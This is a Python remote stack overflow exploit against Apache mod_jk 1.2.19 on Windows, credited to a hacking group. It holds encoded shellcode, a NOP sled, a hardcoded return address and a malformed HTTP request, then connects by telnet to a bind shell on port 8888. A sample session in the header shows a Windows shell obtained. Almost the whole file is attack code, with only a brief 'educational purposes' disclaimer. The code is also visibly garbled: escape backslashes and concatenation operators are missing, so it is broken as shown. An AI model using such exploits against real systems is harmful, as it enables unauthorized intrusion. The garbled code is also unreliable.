#!/usr/bin/python
#
# _____ _ _ _____ _____ _____ _____
# / ___| |_| | _ | _ | _ |_ _|
# | (___| _ | [_)_/| (_) | (_) | | |
# _____|_| |_|_| |_||_____|_____| |_|
# C. H. R. O. O. T. SECURITY GROUP
# - -- ----- --- -- -- ---- --- -- -
#
#
# _ _ _ _____ ____ ____ __ _
# Hacks In Taiwan | |_| | |_ _| __| | | |
# Conference 2008 | _ | | | | | (__| () | |
# |_| |_|_| |_| ____|____|_|__|
#
#
#
# Title =======:: Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit
#
# Author ======:: unohope [at] chroot [dot] org
#
# IRC =========:: #chroot
#
# ScriptName ==:: Apache Module mod_jk/1.2.19
#
# Vendor ======:: /
#
# Download ====:: /dist/tomcat/tomcat-connectors/jk/binaries/win32/
#
# Tested on ===:: Apache/2.0.58 (Win32) mod_jk/1.2.19
# Apache/2.0.59 (Win32) mod_jk/1.2.19
#
# Greets ======:: zha0
#
#
# [root@wargame tmp]# ./apx-jk_mod-1.2.19
# Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@)
#
# usage: ./apx-jk_mod-1.2.19
#
# [root@wargame tmp]# ./apx-jk_mod-1.2.19 192.168.1.78
# Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@)
#
# [ ] connecting to 192.168.1.78 ...
#
# Trying 192.168.1.78...
# Connected to 192.168.1.78.
# Escape character is "^]".
# Microsoft Windows XP [.. 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:AppServApache2
#
#
import os, sys, time
from socket import *
shellcode = "xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
shellcode = "x49x49x49x49x49x49x49x49x49x37x49x49x51x5ax6ax68"
shellcode = "x58x30x41x31x50x42x41x6bx42x41x78x42x32x42x41x32"
shellcode = "x41x41x30x41x41x58x38x42x42x50x75x4bx59x49x6cx43"
shellcode = "x5ax7ax4bx32x6dx5ax48x5ax59x69x6fx4bx4fx39x6fx71"
shellcode = "x70x6ex6bx62x4cx44x64x71x34x4cx4bx62x65x75x6cx4c"
shellcode = "x4bx63x4cx76x65x70x78x35x51x48x6fx6cx4bx50x4fx74"
shellcode = "x58x6ex6bx33x6fx55x70x37x71x48x6bx57x39x6cx4bx66"
shellcode = "x54x6ex6bx46x61x7ax4ex47x41x6bx70x7ax39x4cx6cx4c"
shellcode = "x44x6fx30x62x54x44x47x38x41x4bx7ax54x4dx44x41x4b"
shellcode = "x72x78x6bx39x64x35x6bx53x64x75x74x46x48x72x55x79"
shellcode = "x75x6cx4bx53x6fx76x44x44x41x48x6bx35x36x4ex6bx54"
shellcode = "x4cx30x4bx6cx4bx51x4fx65x4cx65x51x38x6bx77x73x36"
shellcode = "x4cx4ex6bx6ex69x30x6cx66x44x45x4cx30x61x69x53x30"
shellcode = "x31x79x4bx43x54x6cx4bx63x73x44x70x4ex6bx77x30x66"
shellcode = "x6cx6cx4bx72x50x45x4cx4cx6dx4ex6bx73x70x64x48x73"
shellcode = "x6ex55x38x6ex6ex32x6ex34x4ex58x6cx62x70x39x6fx6b"
shellcode = "x66x70x66x61x43x52x46x71x78x30x33x55x62x63x58x63"
shellcode = "x47x34x33x65x62x41x4fx30x54x39x6fx4ax70x52x48x5a"
shellcode = "x6bx38x6dx6bx4cx75x6bx30x50x6bx4fx6ex36x53x6fx6f"
shellcode = "x79x4ax45x32x46x6fx71x6ax4dx34x48x77x72x73x65x73"
shellcode = "x5ax37x72x69x6fx58x50x52x48x4ex39x76x69x4ax55x4c"
shellcode = "x6dx32x77x69x6fx59x46x50x53x43x63x41x43x70x53x70"
shellcode = "x53x43x73x50x53x62x63x70x53x79x6fx6ax70x35x36x61"
shellcode = "x78x71x32x78x38x71x76x30x53x4bx39x69x71x4dx45x33"
shellcode = "x58x6cx64x47x6ax74x30x5ax67x43x67x79x6fx39x46x32"
shellcode = "x4ax56x70x66x31x76x35x59x6fx58x50x32x48x4dx74x4e"
shellcode = "x4dx66x4ex7ax49x50x57x6bx4fx6ex36x46x33x56x35x39"
shellcode = "x6fx78x50x33x58x6bx55x51x59x4ex66x50x49x51x47x39"
shellcode = "x6fx48x56x32x70x32x74x62x74x46x35x4bx4fx38x50x6e"
shellcode = "x73x55x38x4dx37x71x69x69x56x71x69x61x47x6bx4fx6e"
shellcode = "x36x36x35x79x6fx6ax70x55x36x31x7ax71x74x32x46x51"
shellcode = "x78x52x43x70x6dx4fx79x4dx35x72x4ax66x30x42x79x64"
shellcode = "x69x7ax6cx4bx39x48x67x62x4ax57x34x4fx79x6dx32x37"
shellcode = "x41x6bx70x7ax53x6ex4ax69x6ex32x62x46x4dx6bx4ex70"
shellcode = "x42x44x6cx4cx53x6ex6dx31x6ax64x78x4cx6bx4ex4bx4e"
shellcode = "x4bx43x58x70x72x69x6ex6dx63x37x66x79x6fx63x45x73"
shellcode = "x74x4bx4fx7ax76x63x6bx31x47x72x72x41x41x50x51x61"
shellcode = "x41x70x6ax63x31x41x41x46x31x71x45x51x41x4bx4fx78"
shellcode = "x50x52x48x4cx6dx79x49x54x45x38x4ex53x63x6bx4fx6e"
shellcode = "x36x30x6ax49x6fx6bx4fx70x37x4bx4fx4ex30x4ex6bx30"
shellcode = "x57x69x6cx6bx33x4bx74x62x44x79x6fx6bx66x66x32x6b"
shellcode = "x4fx4ex30x53x58x58x70x4ex6ax55x54x41x4fx52x73x4b"
shellcode = "x4fx69x46x4bx4fx6ex30x68";
foo_base = 8
buf_base = 4087
buf_offset = foo_base * 11
nop = "x90"
ret = "xccx2axd9x77"
buf = nop*foo_base shellcode nop*(buf_base - foo_base - len(shellcode) - buf_offset) ret
buf = "x90x90xb0x53x6bxC0x28x03xd8xffxd3" nop*(buf_offset - foo_base - 3)
def usage():
print "usage: %s n" % sys.argv[0]
sys.exit(-1)
def xpl():
try:
print len(buf)
sockaddr = (host, 80)
s = socket(AF_INET, SOCK_STREAM)
s.connect(sockaddr)
payload = buf "HTTP/1.0rnHost: %srnrn�" % host
s.send("GET /" payload)
s.close()
print " [ ] connecting to %s ...n" % host
time.sleep(3)
os.system("telnet %s 8888" % host)
except:
print " [-] EXPLOIT FAILED!n"
if __name__ == "__main__":
print "Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope [at] )n"
try:
host = sys.argv[1]
except IndexError:
usage()
xpl()
# [NOTE]
#
# !! This is just for educational purposes, DO NOT use for illegal. !!
#